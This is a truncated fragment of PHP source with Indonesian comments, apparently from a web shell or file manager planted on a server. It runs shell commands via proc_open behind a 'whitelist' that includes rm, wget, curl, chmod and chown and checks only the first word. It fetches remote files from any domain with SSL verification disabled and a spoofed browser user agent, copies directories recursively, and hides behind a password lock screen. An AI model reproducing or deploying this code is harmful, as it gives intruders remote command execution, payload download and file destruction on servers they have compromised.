Error: Fungsi proc_open() dinonaktifkan di server ini. Tidak dapat menjalankan perintah."; } // Whitelist command untuk keamanan $allowed_commands = ['ls', 'dir', 'pwd', 'whoami', 'date', 'uname', 'df', 'du', 'chmod', 'chown', 'mkdir', 'touch', 'cp', 'mv', 'rm', 'wget', 'curl']; $cmd_parts = explode(' ', trim($cmd)); $base_cmd = $cmd_parts[0]; if (!in_array($base_cmd, $allowed_commands)) { return "
Error: Perintah '$base_cmd' tidak diizinkan untuk alasan keamanan."; } $descriptorspec = array( 0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w") ); $process = @proc_open($cmd, $descriptorspec, $pipes, $cwd, null); if (is_resource($process)) { fclose($pipes[0]); $stdout = stream_get_contents($pipes[1]); fclose($pipes[1]); $stderr = stream_get_contents($pipes[2]); fclose($pipes[2]); $return_value = proc_close($process); return "
\n" . htmlspecialchars($stdout) . "\nError:\n" . htmlspecialchars($stderr) . "\nExit Code: " . htmlspecialchars($return_value) . ""; } else { $last_error = error_get_last(); return "
Error: Could not open process. " . ($last_error ? htmlspecialchars($last_error['message']) : 'Tidak dapat memulai proses eksternal.') . ""; } } function copy_recursive($source, $dest) { if (is_file($source)) { // Pastikan direktori tujuan ada $dest_dir = dirname($dest); if (!is_dir($dest_dir)) { @mkdir($dest_dir, 0755, true); } return copy($source, $dest); } elseif (is_dir($source)) { @mkdir($dest, 0755, true); $items = array_diff(@scandir($source) ?: [], ['.', '..']); foreach ($items as $item) { if (!copy_recursive($source . DIRECTORY_SEPARATOR . $item, $dest . DIRECTORY_SEPARATOR . $item)) { return false; } } return true; } return false; } function getUrlContent($url) { if (!extension_loaded('curl')) { error_log("cURL extension not loaded."); return false; } // Validasi URL untuk keamanan if (!filter_var($url, FILTER_VALIDATE_URL)) { error_log("Invalid URL: " . $url); return false; } // Perluas domain yang diizinkan $allowed_domains = [ 'github.com', 'raw.githubusercontent.com', 'pastebin.com', 'gitlab.com', 'bitbucket.org', 'sourceforge.net', 'drive.google.com', 'dropbox.com', 'mediafire.com', '4shared.com', 'zippyshare.com', 'mega.nz' ]; $parsed_url = parse_url($url); $host = isset($parsed_url['host']) ? $parsed_url['host'] : ''; // Izinkan semua domain untuk fleksibilitas, tapi tetap validasi URL if (!empty($host) && !in_array($host, $allowed_domains)) { error_log("Domain not in whitelist: " . $host); // Lanjutkan saja untuk fleksibilitas, tapi catat di log } $ch = curl_init($url); curl_setopt_array($ch, [ CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36', CURLOPT_TIMEOUT => 60, // Diperpanjang timeout CURLOPT_MAXREDIRS => 10, ]); $data = curl_exec($ch); if (curl_errno($ch)) { error_log("cURL error: " . curl_error($ch)); $data = false; } curl_close($ch); return $data; } // Handle lock file for authentication if (file_exists($lock_file) && !isset($_SESSION['unlocked'])) { if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['pass'])) { $hash = file_get_contents($lock_file); if (password_verify($_POST['pass'], $hash)) { $_SESSION['unlocked'] = true; session_regenerate_id(true); // Keamanan session header("Location: ?d=" . urlencode($cwd)); exit; } else { $msg = "Password salah"; } } echo <<
Please enter your password to access this resource
Author: Admin
Contact: Email
Purpose:
Version: 1.0 | Last updated: July 2025